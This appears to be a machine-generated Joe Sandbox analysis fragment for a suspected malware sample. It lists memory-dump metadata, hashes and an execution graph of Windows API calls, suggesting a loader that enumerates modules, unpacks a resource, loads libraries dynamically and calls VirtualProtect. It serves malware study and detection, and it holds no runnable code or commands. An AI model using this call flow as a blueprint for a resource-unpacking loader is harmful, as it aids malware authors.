                                                                                                                  • IsBadWritePtr.KERNEL32(?,00000004), ref: 02B2AF88
                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000008), ref: 02B2AFA7
                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B2AFB3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Read$Write
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3448952669-0
                                                                                                                  • Opcode ID: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                                                                  • Instruction ID: 3db4d0fc2c1fb154ba514444d524e1075af158aa2dd4818251ed6f8d859da57b
                                                                                                                  • Opcode Fuzzy Hash: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                                                                  • Instruction Fuzzy Hash: EC2184B264072A9BDB10DF69CCC0BAE77A9EF44351F004591FD18D7384E738E9158AA4

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:12.6%
                                                                                                                  Dynamic/Decrypted Code Coverage:78.7%
                                                                                                                  Signature Coverage:24.2%
                                                                                                                  Total number of Nodes:801
                                                                                                                  Total number of Limit Nodes:48
                                                                                                                  execution_graph 54671 2411d030 54672 2411d048 54671->54672 54673 2411d0a2 54672->54673 54678 29b5993c 54672->54678 54689 29b5db7b 54672->54689 54700 29b59fc8 54672->54700 54704 29b59fb8 54672->54704 54679 29b59947 54678->54679 54680 29b5dbe9 54679->54680 54682 29b5dbd9 54679->54682 54742 29b5d6dc 54680->54742 54683 29b5dbe7 54682->54683 54708 29b5dd08 54682->54708 54717 29c46a78 54682->54717 54722 29c46a68 54682->54722 54727 29b5dd10 54682->54727 54736 29c46b44 54682->54736 54683->54683 54690 29b5db88 54689->54690 54691 29b5dbe9 54690->54691 54693 29b5dbd9 54690->54693 54692 29b5d6dc 3 API calls 54691->54692 54694 29b5dbe7 54692->54694 54693->54694 54695 29c46b44 3 API calls 54693->54695 54696 29b5dd10 3 API calls 54693->54696 54697 29c46a68 3 API calls 54693->54697 54698 29c46a78 3 API calls 54693->54698 54699 29b5dd08 3 API calls 54693->54699 54694->54694 54695->54694 54696->54694 54697->54694 54698->54694 54699->54694 54701 29b59fee 54700->54701 54702 29b5993c 3 API calls 54701->54702 54703 29b5a00f 54702->54703 54703->54673 54705 29b59fee 54704->54705 54706 29b5993c 3 API calls 54705->54706 54707 29b5a00f 54706->54707 54707->54673 54709 29b5dd10 54708->54709 54710 29b5dd1e 54709->54710 54711 29b5dd50 54709->54711 54713 29b5d6dc 3 API calls 54710->54713 54716 29b5dd26 54710->54716 54712 29b5d6fc GetCurrentThreadId 54711->54712 54714 29b5dd5c 54712->54714 54715 29b5dd64 54713->54715 54714->54683 54715->54683 54716->54683 54718 29c46a8c 54717->54718 54749 29c46b20 54718->54749 54752 29c46b30 54718->54752 54719 29c46b18 54719->54683 54724 29c46a8c 54722->54724 54723 29c46b18 54723->54683 54725 29c46b20 3 API calls 54724->54725 54726 29c46b30 3 API calls 54724->54726 54725->54723 54726->54723 54728 29b5dd1e 54727->54728 54729 29b5dd4b 54727->54729 54732 29b5d6dc 3 API calls 54728->54732 54735 29b5dd26 54728->54735 54729->54728 54730 29b5dd50 54729->54730 54731 29b5d6fc GetCurrentThreadId 54730->54731 54733 29b5dd5c 54731->54733 54734 29b5dd64 54732->54734 54733->54683 54734->54683 54735->54683 54737 29c46b02 54736->54737 54738 29c46b52 54736->54738 54740 29c46b20 3 API calls 54737->54740 54741 29c46b30 3 API calls 54737->54741 54739 29c46b18 54739->54683 54740->54739 54741->54739 54743 29b5d6e7 54742->54743 54744 29b5de64 54743->54744 54745 29b5ddba 54743->54745 54746 29b5993c 2 API calls 54744->54746 54747 29b5de12 CallWindowProcW 54745->54747 54748 29b5ddc1 54745->54748 54746->54748 54747->54748 54748->54683 54750 29c46b41 54749->54750 54755 29c47c8a 54749->54755 54750->54719 54753 29c46b41 54752->54753 54754 29c47c8a 3 API calls 54752->54754 54753->54719 54754->54753 54756 29c47bd7 54755->54756 54756->54755 54758 29c47ba3 54756->54758 54759 29b5d6dc 3 API calls 54756->54759 54761 29b5dd69 54756->54761 54757 29c47d0a 54757->54750 54758->54750 54759->54757 54762 29b5de64 54761->54762 54763 29b5ddba 54761->54763 54764 29b5993c 2 API calls 54762->54764 54765 29b5de12 CallWindowProcW 54763->54765 54766 29b5ddc1 54763->54766 54764->54766 54765->54766 54766->54757 54338 29b5a1f0 54339 29b5a1f8 54338->54339 54341 29b5a217 54338->54341 54339->54341 54342 29b577cc 54339->54342 54343 29b590e0 GetModuleHandleW 54342->54343 54345 29b59184 54343->54345 54345->54341 54346 29b59d30 54347 29b59dc8 CreateWindowExW 54346->54347 54349 29b59f06 54347->54349 54349->54349 54358 29b5e120 54361 29b5e14d 54358->54361 54359 29b5e19c 54359->54359 54361->54359 54362 29b5d734 54361->54362 54363 29b5d73f 54362->54363 54368 29b5d6fc 54363->54368 54365 29b5e2fc 54372 29b5452c 54365->54372 54369 29b5d707 54368->54369 54378 29b5d754 54369->54378 54371 29b5e355 54371->54365 54374 29b54537 54372->54374 54373 29b57c48 54373->54359 54374->54373 54382 29b5776c 54374->54382 54379 29b5d75f 54378->54379 54380 29b5e4c1 GetCurrentThreadId 54379->54380 54381 29b5e4eb 54379->54381 54380->54381 54381->54371 54384 29b57777 54382->54384 54383 29b57c0f 54383->54373 54387 29b5777c 54383->54387 54384->54383 54390 29b58669 54384->54390 54400 29b58678 54384->54400 54388 29b5e020 SetTimer 54387->54388 54389 29b5e0cd 54388->54389 54389->54373 54391 29b586a3 54390->54391 54410 29b577bc 54391->54410 54394 29b58726 54395 29b577cc GetModuleHandleW 54394->54395 54396 29b58752 54394->54396 54395->54396 54398 29b577bc GetModuleHandleW 54398->54394 54401 29b586a3 54400->54401 54402 29b577bc GetModuleHandleW 54401->54402 54403 29b5870a 54402->54403 54407 29b58c30 GetModuleHandleW 54403->54407 54408 29b577bc GetModuleHandleW 54403->54408 54409 29b58b98 GetModuleHandleW 54403->54409 54404 29b58726 54405 29b577cc GetModuleHandleW 54404->54405 54406 29b58752 54404->54406 54405->54406 54407->54404 54408->54404 54409->54404 54411 29b577c7 54410->54411 54412 29b5870a 54411->54412 54422 29b58da0 54411->54422 54412->54398 54414 29b58b98 54412->54414 54418 29b58c30 54412->54418 54415 29b58ba8 54414->54415 54416 29b58bb3 54415->54416 54417 29b58da0 GetModuleHandleW 54415->54417 54416->54394 54417->54416 54419 29b58c6d 54418->54419 54420 29b58cee 54419->54420 54421 29b58da0 GetModuleHandleW 54419->54421 54421->54420 54423 29b58dc5 54422->54423 54424 29b577cc GetModuleHandleW 54423->54424 54425 29b58de9 54423->54425 54424->54425 54426 29b577cc GetModuleHandleW 54425->54426 54431 29b58fa5 54425->54431 54427 29b58f2b 54426->54427 54428 29b577cc GetModuleHandleW 54427->54428 54427->54431 54429 29b58f79 54428->54429 54430 29b577cc GetModuleHandleW 54429->54430 54429->54431 54430->54431 54431->54412 54350 2417f250 54352 2417f277 54350->54352 54354 2417f368 54352->54354 54355 2417f3b1 VirtualProtect 54354->54355 54357 2417f346 54355->54357 54432 29b546e8 54435 29b546f7 54432->54435 54436 29b54701 54432->54436 54440 29b54710 54432->54440 54437 29b5473e 54436->54437 54438 29b547c9 54437->54438 54439 29b5452c 2 API calls 54437->54439 54438->54438 54439->54438 54441 29b5473e 54440->54441 54442 29b547c9 54441->54442 54443 29b5452c 2 API calls 54441->54443 54442->54442 54443->54442 54444 40cbdd 54445 40cbe9 __fdopen 54444->54445 54488 40d534 HeapCreate 54445->54488 54448 40cc46 54549 41087e 71 API calls 8 library calls 54448->54549 54451 40cc4c 54452 40cc50 54451->54452 54453 40cc58 __RTC_Initialize 54451->54453 54550 40cbb4 62 API calls 3 library calls 54452->54550 54490 411a15 67 API calls 3 library calls 54453->54490 54455 40cc57 54455->54453 54457 40cc66 54458 40cc72 GetCommandLineA 54457->54458 54459 40cc6a 54457->54459 54491 412892 71 API calls 3 library calls 54458->54491 54551 40e79a 62 API calls 3 library calls 54459->54551 54462 40cc71 54462->54458 54463 40cc82 54552 4127d7 107 API calls 3 library calls 54463->54552 54465 40cc8c 54466 40cc90 54465->54466 54467 40cc98 54465->54467 54553 40e79a 62 API calls 3 library calls 54466->54553 54492 41255f 106 API calls 6 library calls 54467->54492 54470 40cc97 54470->54467 54471 40cc9d 54472 40cca1 54471->54472 54473 40cca9 54471->54473 54554 40e79a 62 API calls 3 library calls 54472->54554 54493 40e859 73 API calls 5 library calls 54473->54493 54476 40cca8 54476->54473 54477 40ccb0 54478 40ccb5 54477->54478 54479 40ccbc 54477->54479 54555 40e79a 62 API calls 3 library calls 54478->54555 54494 4019f0 OleInitialize 54479->54494 54482 40ccbb 54482->54479 54483 40ccd8 54484 40ccea 54483->54484 54556 40ea0a 62 API calls _doexit 54483->54556 54557 40ea36 62 API calls _doexit 54484->54557 54487 40ccef __fdopen 54489 40cc3a 54488->54489 54489->54448 54548 40cbb4 62 API calls 3 library calls 54489->54548 54490->54457 54491->54463 54492->54471 54493->54477 54495 401ab9 54494->54495 54558 40b99e 54495->54558 54497 401abf 54498 401acd GetCurrentProcessId CreateToolhelp32Snapshot Module32First 54497->54498 54525 402467 54497->54525 54499 401dc3 CloseHandle GetModuleHandleA 54498->54499 54506 401c55 54498->54506 54571 401650 54499->54571 54501 401e8b FindResourceA LoadResource LockResource SizeofResource 54573 40b84d 54501->54573 54505 401c9c CloseHandle 54505->54483 54506->54505 54511 401cf9 Module32Next 54506->54511 54507 401ecb _memset 54508 401efc SizeofResource 54507->54508 54509 401f1c 54508->54509 54510 401f5f 54508->54510 54509->54510 54629 401560 __VEC_memcpy __fptostr 54509->54629 54513 401f92 _memset 54510->54513 54630 401560 __VEC_memcpy __fptostr 54510->54630 54511->54499 54520 401d0f 54511->54520 54515 401fa2 FreeResource 54513->54515 54516 40b84d _malloc 62 API calls 54515->54516 54517 401fbb SizeofResource 54516->54517 54518 401fe5 _memset 54517->54518 54519 4020aa LoadLibraryA 54518->54519 54521 401650 54519->54521 54520->54505 54523 401dad Module32Next 54520->54523 54522 40216c GetProcAddress 54521->54522 54524 4021aa 54522->54524 54522->54525 54523->54499 54523->54520 54524->54525 54603 4018f0 54524->54603 54525->54483 54527 40243f 54527->54525 54631 40b6b5 62 API calls 2 library calls 54527->54631 54529 4021f1 54529->54527 54615 401870 54529->54615 54531 402269 VariantInit 54532 401870 75 API calls 54531->54532 54533 40228b VariantInit 54532->54533 54534 4022a7 54533->54534 54535 4022d9 SafeArrayCreate SafeArrayAccessData 54534->54535 54620 40b350 54535->54620 54538 40232c 54539 402354 SafeArrayDestroy 54538->54539 54547 40235b 54538->54547 54539->54547 54540 402392 SafeArrayCreateVector 54541 4023a4 54540->54541 54542 4023bc VariantClear VariantClear 54541->54542 54622 4019a0 54542->54622 54545 40242e 54546 4019a0 65 API calls 54545->54546 54546->54527 54547->54540 54548->54448 54549->54451 54550->54455 54551->54462 54552->54465 54553->54470 54554->54476 54555->54482 54556->54484 54557->54487 54559 40b9aa __fdopen _strnlen 54558->54559 54560 40b9b8 54559->54560 54564 40b9ec 54559->54564 54632 40bfc1 62 API calls __getptd_noexit 54560->54632 54562 40b9bd 54633 40e744 6 API calls 2 library calls 54562->54633 54634 40d6e0 62 API calls 2 library calls 54564->54634 54566 40b9f3 54635 40b917 120 API calls 3 library calls 54566->54635 54568 40b9cd __fdopen 54568->54497 54569 40b9ff 54636 40ba18 LeaveCriticalSection _doexit 54569->54636 54572 4017cc ___crtGetEnvironmentStringsA 54571->54572 54572->54501 54574 40b900 54573->54574 54585 40b85f 54573->54585 54644 40d2e3 6 API calls __decode_pointer 54574->54644 54576 40b906 54645 40bfc1 62 API calls __getptd_noexit 54576->54645 54579 401ebf 54591 40af66 54579->54591 54582 40b8bc RtlAllocateHeap 54582->54585 54583 40b870 54583->54585 54637 40ec4d 62 API calls 2 library calls 54583->54637 54638 40eaa2 62 API calls 7 library calls 54583->54638 54639 40e7ee GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 54583->54639 54585->54579 54585->54582 54585->54583 54586 40b8ec 54585->54586 54589 40b8f1 54585->54589 54640 40b7fe 62 API calls 4 library calls 54585->54640 54641 40d2e3 6 API calls __decode_pointer 54585->54641 54642 40bfc1 62 API calls __getptd_noexit 54586->54642 54643 40bfc1 62 API calls __getptd_noexit 54589->54643 54593 40af70 54591->54593 54592 40b84d _malloc 62 API calls 54592->54593 54593->54592 54594 40af8a 54593->54594 54598 40af8c std::bad_alloc::bad_alloc 54593->54598 54646 40d2e3 6 API calls __decode_pointer 54593->54646 54594->54507 54596 40afb2 54648 40af49 62 API calls std::exception::exception 54596->54648 54598->54596 54647 40d2bd 73 API calls __cinit 54598->54647 54599 40afbc 54649 40cd39 RaiseException 54599->54649 54602 40afca 54604 401903 lstrlenA 54603->54604 54605 4018fc 54603->54605 54650 4017e0 54604->54650 54605->54529 54608 401940 GetLastError 54610 40194b MultiByteToWideChar 54608->54610 54612 40198d 54608->54612 54609 401996 54609->54529 54611 4017e0 77 API calls 54610->54611 54613 401970 MultiByteToWideChar 54611->54613 54612->54609 54666 401030 GetLastError EntryPoint 54612->54666 54613->54612 54616 40af66 74 API calls 54615->54616 54617 40187c 54616->54617 54618 401885 SysAllocString 54617->54618 54619 4018a4 54617->54619 54618->54619 54619->54531 54621 40231a SafeArrayUnaccessData 54620->54621 54621->54538 54623 4019df VariantClear 54622->54623 54624 4019aa InterlockedDecrement 54622->54624 54623->54545 54624->54623 54625 4019b8 54624->54625 54625->54623 54626 4019c2 SysFreeString 54625->54626 54627 4019c9 54625->54627 54626->54627 54670 40aec0 63 API calls 2 library calls 54627->54670 54629->54509 54630->54513 54631->54525 54632->54562 54634->54566 54635->54569 54636->54568 54637->54583 54638->54583 54640->54585 54641->54585 54642->54589 54643->54579 54644->54576 54645->54579 54646->54593 54647->54596 54648->54599 54649->54602 54651 4017f3 54650->54651 54652 4017e9 EntryPoint 54650->54652 54653 401805 54651->54653 54654 4017fb EntryPoint 54651->54654 54652->54651 54655 401818 54653->54655 54656 40180e EntryPoint 54653->54656 54654->54653 54657 40183e 54655->54657 54662 401844 54655->54662 54667 40b783 72 API calls 4 library calls 54655->54667 54656->54655 54668 40b6b5 62 API calls 2 library calls 54657->54668 54661 40182d 54661->54662 54665 401834 EntryPoint 54661->54665 54663 40186d MultiByteToWideChar 54662->54663 54664 40184e EntryPoint 54662->54664 54669 40b743 62 API calls 2 library calls 54662->54669 54663->54608 54663->54609 54664->54662 54665->54657 54667->54661 54668->54662 54669->54662 54670->54623 55320 29b5c888 55321 29b5c8ce GetCurrentProcess 55320->55321 55323 29b5c920 GetCurrentThread 55321->55323 55324 29b5c919 55321->55324 55325 29b5c956 55323->55325 55326 29b5c95d GetCurrentProcess 55323->55326 55324->55323 55325->55326 55327 29b5c993 55326->55327 55332 29b5ca57 55327->55332 55336 29b5cea8 55327->55336 55328 29b5c9bb GetCurrentThreadId 55329 29b5c9ec 55328->55329 55333 29b5cabf DuplicateHandle 55332->55333 55335 29b5ca62 55332->55335 55334 29b5cbad 55333->55334 55334->55328 55335->55328 55337 29b5cec6 55336->55337 55337->55328 54767 2417f638 54768 2417f67c CloseHandle 54767->54768 54770 2417f6c8 54768->54770 54771 28dfaa30 54772 28dfaa42 KiUserExceptionDispatcher 54771->54772 54774 28dfaad3 54772->54774 54892 29930040 54774->54892 54896 2993003f 54774->54896 54775 28dfaaef 54900 29930607 54775->54900 54904 29930608 54775->54904 54776 28dfaaf6 54908 2993a1cf 54776->54908 54912 2993a1d0 54776->54912 54777 28dfaafd 54916 2993a797 54777->54916 54920 2993a798 54777->54920 54778 28dfab04 54924 2993ad60 54778->54924 54928 2993ad5f 54778->54928 54779 28dfab0b 54932 2993b318 54779->54932 54936 2993b328 54779->54936 54780 28dfab12 54940 2993b8ef 54780->54940 54944 2993b8f0 54780->54944 54781 28dfab19 54948 2993beb8 54781->54948 54952 2993bea8 54781->54952 54782 28dfab20 54956 2993c480 54782->54956 54960 2993c47c 54782->54960 54783 28dfab27 54964 2993ca38 54783->54964 54968 2993ca48 54783->54968 54784 28dfab2e 54972 2993d001 54784->54972 54976 2993d010 54784->54976 54785 28dfab35 54980 2993d5d8 54785->54980 54984 2993d5c8 54785->54984 54786 28dfab3c 54988 2993db91 54786->54988 54992 2993dba0 54786->54992 54787 28dfab43 54996 2993e158 54787->54996 55000 2993e168 54787->55000 54788 28dfab4a 55004 2993e730 54788->55004 55008 2993e721 54788->55008 54789 28dfab51 55012 2993ecf8 54789->55012 55016 2993ece8 54789->55016 54790 28dfab58 55020 2993f2c0 54790->55020 55024 2993f2bc 54790->55024 54791 28dfab5f 55028 2993f887 54791->55028 55032 2993f888 54791->55032 54792 28dfab66 55036 29950040 54792->55036 55040 2995003f 54792->55040 54793 28dfab6d 55044 29950607 54793->55044 55048 29950608 54793->55048 54794 28dfab74 55052 29950bd0 54794->55052 55056 29950bcf 54794->55056 54795 28dfab7b 55060 29951198 54795->55060 55064 29951188 54795->55064 54796 28dfab82 55068 29951760 54796->55068 55072 2995175f 54796->55072 54797 28dfab89 55076 29957120 54797->55076 55080 2995711f 54797->55080 54798 28dfabb6 55084 29957710 54798->55084 55088 2995770c 54798->55088 54799 28dfabc4 55092 29957cd7 54799->55092 55096 29957cd8 54799->55096 54800 28dfabcb 55100 299582a0 54800->55100 55104 2995829f 54800->55104 54801 28dfabd2 55108 29958868 54801->55108 55112 29958867 54801->55112 54802 28dfabd9 55116 29958e30 54802->55116 55120 29958e2f 54802->55120 54803 28dfabe0 55124 299593e9 54803->55124 55128 299593f8 54803->55128 54804 28dfabe7 55132 299599e8 54804->55132 55136 299599e7 54804->55136 54805 28dfabf5 55140 29959fb8 54805->55140 55144 29959fb7 54805->55144 54806 28dfabfc 55148 2995a570 54806->55148 55152 2995a580 54806->55152 54807 28dfac03 55156 2995ab39 54807->55156 55160 2995ab48 54807->55160 54808 28dfac0a 55164 2995b110 54808->55164 55168 2995b10a 54808->55168 54809 28dfac11 55172 2995b6d8 54809->55172 55176 2995b6c8 54809->55176 54810 28dfac18 55180 2995bc9f 54810->55180 55184 2995bca0 54810->55184 54811 28dfac1f 55188 2995c259 54811->55188 55192 2995c268 54811->55192 54812 28dfac26 55196 29b5ed28 54812->55196 55200 29b5ed27 54812->55200 54893 29930062 54892->54893 55204 28dfe660 54893->55204 54894 29930158 54894->54775 54897 29930062 54896->54897 54899 28dfe660 LdrInitializeThunk 54897->54899 54898 29930158 54898->54775 54899->54898 54901 2993062a 54900->54901 54903 28dfe660 LdrInitializeThunk 54901->54903 54902 29930720 54902->54776 54903->54902 54905 2993062a 54904->54905 54907 28dfe660 LdrInitializeThunk 54905->54907 54906 29930720 54906->54776 54907->54906 54909 2993a1f2 54908->54909 54911 28dfe660 LdrInitializeThunk 54909->54911 54910 2993a2e8 54910->54777 54911->54910 54913 2993a1f2 54912->54913 54915 28dfe660 LdrInitializeThunk 54913->54915 54914 2993a2e8 54914->54777 54915->54914 54917 2993a7ba 54916->54917 54919 28dfe660 LdrInitializeThunk 54917->54919 54918 2993a8b0 54918->54778 54919->54918 54921 2993a7ba 54920->54921 54923 28dfe660 LdrInitializeThunk 54921->54923 54922 2993a8b0 54922->54778 54923->54922 54925 2993ad82 54924->54925 54927 28dfe660 LdrInitializeThunk 54925->54927 54926 2993ae78 54926->54779 54927->54926 54929 2993ad82 54928->54929 54931 28dfe660 LdrInitializeThunk 54929->54931 54930 2993ae78 54930->54779 54931->54930 54933 2993b34a 54932->54933 54935 28dfe660 LdrInitializeThunk 54933->54935 54934 2993b440 54934->54780 54935->54934 54937 2993b34a 54936->54937 54939 28dfe660 LdrInitializeThunk 54937->54939 54938 2993b440 54938->54780 54939->54938 54941 2993b912 54940->54941 54943 28dfe660 LdrInitializeThunk 54941->54943 54942 2993ba08 54942->54781 54943->54942 54945 2993b912 54944->54945 54947 28dfe660 LdrInitializeThunk 54945->54947 54946 2993ba08 54946->54781 54947->54946 54949 2993beda 54948->54949 54951 28dfe660 LdrInitializeThunk 54949->54951 54950 2993bfd0 54950->54782 54951->54950 54953 2993beb8 54952->54953 54955 28dfe660 LdrInitializeThunk 54953->54955 54954 2993bfd0 54954->54782 54955->54954 54957 2993c4a2 54956->54957 54959 28dfe660 LdrInitializeThunk 54957->54959 54958 2993c598 54958->54783 54959->54958 54961 2993c4a2 54960->54961 54963 28dfe660 LdrInitializeThunk 54961->54963 54962 2993c598 54962->54783 54963->54962 54965 2993ca6a 54964->54965 54967 28dfe660 LdrInitializeThunk 54965->54967 54966 2993cb60 54966->54784 54967->54966 54969 2993ca6a 54968->54969 54971 28dfe660 LdrInitializeThunk 54969->54971 54970 2993cb60 54970->54784 54971->54970 54973 2993d032 54972->54973 54975 28dfe660 LdrInitializeThunk 54973->54975 54974 2993d128 54974->54785 54975->54974 54977 2993d032 54976->54977 54979 28dfe660 LdrInitializeThunk 54977->54979 54978 2993d128 54978->54785 54979->54978 54981 2993d5fa 54980->54981 54983 28dfe660 LdrInitializeThunk 54981->54983 54982 2993d6f0 54982->54786 54983->54982 54985 2993d5fa 54984->54985 54987 28dfe660 LdrInitializeThunk 54985->54987 54986 2993d6f0 54986->54786 54987->54986 54989 2993dbc2 54988->54989 54991 28dfe660 LdrInitializeThunk 54989->54991 54990 2993dcb8 54990->54787 54991->54990 54993 2993dbc2 54992->54993 54995 28dfe660 LdrInitializeThunk 54993->54995 54994 2993dcb8 54994->54787 54995->54994 54997 2993e18a 54996->54997 54999 28dfe660 LdrInitializeThunk 54997->54999 54998 2993e280 54998->54788 54999->54998 55001 2993e18a 55000->55001 55003 28dfe660 LdrInitializeThunk 55001->55003 55002 2993e280 55002->54788 55003->55002 55005 2993e752 55004->55005 55007 28dfe660 LdrInitializeThunk 55005->55007 55006 2993e848 55006->54789 55007->55006 55009 2993e752 55008->55009 55011 28dfe660 LdrInitializeThunk 55009->55011 55010 2993e848 55010->54789 55011->55010 55013 2993ed1a 55012->55013 55015 28dfe660 LdrInitializeThunk 55013->55015 55014 2993ee10 55014->54790 55015->55014 55017 2993ed1a 55016->55017 55019 28dfe660 LdrInitializeThunk 55017->55019 55018 2993ee10 55018->54790 55019->55018 55021 2993f2e2 55020->55021 55023 28dfe660 LdrInitializeThunk 55021->55023 55022 2993f3d8 55022->54791 55023->55022 55025 2993f2c0 55024->55025 55027 28dfe660 LdrInitializeThunk 55025->55027 55026 2993f3d8 55026->54791 55027->55026 55029 2993f8aa 55028->55029 55031 28dfe660 LdrInitializeThunk 55029->55031 55030 2993f9a0 55030->54792 55031->55030 55033 2993f8aa 55032->55033 55035 28dfe660 LdrInitializeThunk 55033->55035 55034 2993f9a0 55034->54792 55035->55034 55037 29950062 55036->55037 55039 28dfe660 LdrInitializeThunk 55037->55039 55038 29950158 55038->54793 55039->55038 55041 29950062 55040->55041 55043 28dfe660 LdrInitializeThunk 55041->55043 55042 29950158 55042->54793 55043->55042 55045 2995062a 55044->55045 55047 28dfe660 LdrInitializeThunk 55045->55047 55046 29950720 55046->54794 55047->55046 55049 2995062a 55048->55049 55051 28dfe660 LdrInitializeThunk 55049->55051 55050 29950720 55050->54794 55051->55050 55053 29950bf2 55052->55053 55055 28dfe660 LdrInitializeThunk 55053->55055 55054 29950ce8 55054->54795 55055->55054 55057 29950bf2 55056->55057 55059 28dfe660 LdrInitializeThunk 55057->55059 55058 29950ce8 55058->54795 55059->55058 55061 299511ba 55060->55061 55063 28dfe660 LdrInitializeThunk 55061->55063 55062 299512b0 55062->54796 55063->55062 55065 299511ba 55064->55065 55067 28dfe660 LdrInitializeThunk 55065->55067 55066 299512b0 55066->54796 55067->55066 55069 29951782 55068->55069 55071 28dfe660 LdrInitializeThunk 55069->55071 55070 29951878 55070->54797 55071->55070 55073 29951782 55072->55073 55075 28dfe660 LdrInitializeThunk 55073->55075 55074 29951878 55074->54797 55075->55074 55077 29957142 55076->55077 55079 28dfe660 LdrInitializeThunk 55077->55079 55078 29957238 55078->54798 55079->55078 55081 29957142 55080->55081 55083 28dfe660 LdrInitializeThunk 55081->55083 55082 29957238 55082->54798 55083->55082 55085 29957732 55084->55085 55087 28dfe660 LdrInitializeThunk 55085->55087 55086 29957828 55086->54799 55087->55086 55089 29957732 55088->55089 55091 28dfe660 LdrInitializeThunk 55089->55091 55090 29957828 55090->54799 55091->55090 55093 29957cfa 55092->55093 55095 28dfe660 LdrInitializeThunk 55093->55095 55094 29957df0 55094->54800 55095->55094 55097 29957cfa 55096->55097 55099 28dfe660 LdrInitializeThunk 55097->55099 55098 29957df0 55098->54800 55099->55098 55101 299582c2 55100->55101 55103 28dfe660 LdrInitializeThunk 55101->55103 55102 299583b8 55102->54801 55103->55102 55105 299582c2 55104->55105 55107 28dfe660 LdrInitializeThunk 55105->55107 55106 299583b8 55106->54801 55107->55106 55109 2995888a 55108->55109 55111 28dfe660 LdrInitializeThunk 55109->55111 55110 29958980 55110->54802 55111->55110 55113 2995888a 55112->55113 55115 28dfe660 LdrInitializeThunk 55113->55115 55114 29958980 55114->54802 55115->55114 55117 29958e52 55116->55117 55119 28dfe660 LdrInitializeThunk 55117->55119 55118 29958f48 55118->54803 55119->55118 55121 29958e52 55120->55121 55123 28dfe660 LdrInitializeThunk 55121->55123 55122 29958f48 55122->54803 55123->55122 55125 2995941a 55124->55125 55127 28dfe660 LdrInitializeThunk 55125->55127 55126 29959510 55126->54804 55127->55126 55129 2995941a 55128->55129 55131 28dfe660 LdrInitializeThunk 55129->55131 55130 29959510 55130->54804 55131->55130 55133 29959a0a 55132->55133 55135 28dfe660 LdrInitializeThunk 55133->55135 55134 29959b0a 55134->54805 55135->55134 55137 29959a0a 55136->55137 55139 28dfe660 LdrInitializeThunk 55137->55139 55138 29959b0a 55138->54805 55139->55138 55141 29959fda 55140->55141 55143 28dfe660 LdrInitializeThunk 55141->55143 55142 2995a0d0 55142->54806 55143->55142 55145 29959fda 55144->55145 55147 28dfe660 LdrInitializeThunk 55145->55147 55146 2995a0d0 55146->54806 55147->55146 55149 2995a5a2 55148->55149 55151 28dfe660 LdrInitializeThunk 55149->55151 55150 2995a698 55150->54807 55151->55150 55153 2995a5a2 55152->55153 55155 28dfe660 LdrInitializeThunk 55153->55155 55154 2995a698 55154->54807 55155->55154 55157 2995ab6a 55156->55157 55159 28dfe660 LdrInitializeThunk 55157->55159 55158 2995ac60 55158->54808 55159->55158 55161 2995ab6a 55160->55161 55163 28dfe660 LdrInitializeThunk 55161->55163 55162 2995ac60 55162->54808 55163->55162 55165 2995b132 55164->55165 55167 28dfe660 LdrInitializeThunk 55165->55167 55166 2995b228 55166->54809 55167->55166 55169 2995b132 55168->55169 55171 28dfe660 LdrInitializeThunk 55169->55171 55170 2995b228 55170->54809 55171->55170 55173 2995b6fa 55172->55173 55175 28dfe660 LdrInitializeThunk 55173->55175 55174 2995b7f0 55174->54810 55175->55174 55177 2995b6fa 55176->55177 55179 28dfe660 LdrInitializeThunk 55177->55179 55178 2995b7f0 55178->54810 55179->55178 55181 2995bcc2 55180->55181 55183 28dfe660 LdrInitializeThunk 55181->55183 55182 2995bdb8 55182->54811 55183->55182 55185 2995bcc2 55184->55185 55187 28dfe660 LdrInitializeThunk 55185->55187 55186 2995bdb8 55186->54811 55187->55186 55189 2995c28a 55188->55189 55191 28dfe660 LdrInitializeThunk 55189->55191 55190 2995c380 55190->54812 55191->55190 55193 2995c28a 55192->55193 55195 28dfe660 LdrInitializeThunk 55193->55195 55194 2995c380 55194->54812 55195->55194 55197 29b5ed37 55196->55197 55208 29b5d968 55197->55208 55201 29b5ed37 55200->55201 55202 29b5d968 3 API calls 55201->55202 55203 28dfac88 55202->55203 55207 28dfe691 55204->55207 55205 28dfe7f4 55205->54894 55206 28dfebd9 LdrInitializeThunk 55206->55205 55207->55205 55207->55206 55210 29b5d973 55208->55210 55212 29b5da0c 55210->55212 55211 29b5ee2e 55211->55211 55214 29b5da17 55212->55214 55213 29b5f6c9 55215 29b5f724 55213->55215 55228 29c4a900 55213->55228 55232 29c4a8f8 55213->55232 55214->55213 55214->55215 55220 29c40dc0 55214->55220 55224 29c40db0 55214->55224 55215->55211 55221 29c40de1 55220->55221 55222 29c40e05 55221->55222 55236 29c40f5f 55221->55236 55222->55213 55225 29c40de1 55224->55225 55226 29c40e05 55225->55226 55227 29c40f5f 2 API calls 55225->55227 55226->55213 55227->55226 55229 29c4a965 55228->55229 55231 29c4a9b2 55229->55231 55317 29c4a4ec 55229->55317 55231->55215 55233 29c4a965 55232->55233 55234 29c4a4ec DispatchMessageW 55233->55234 55235 29c4a9b2 55233->55235 55234->55233 55235->55215 55238 29c40f7d 55236->55238 55237 29c40fb6 55237->55222 55238->55237 55241 29c40fd8 55238->55241 55247 29c40fc9 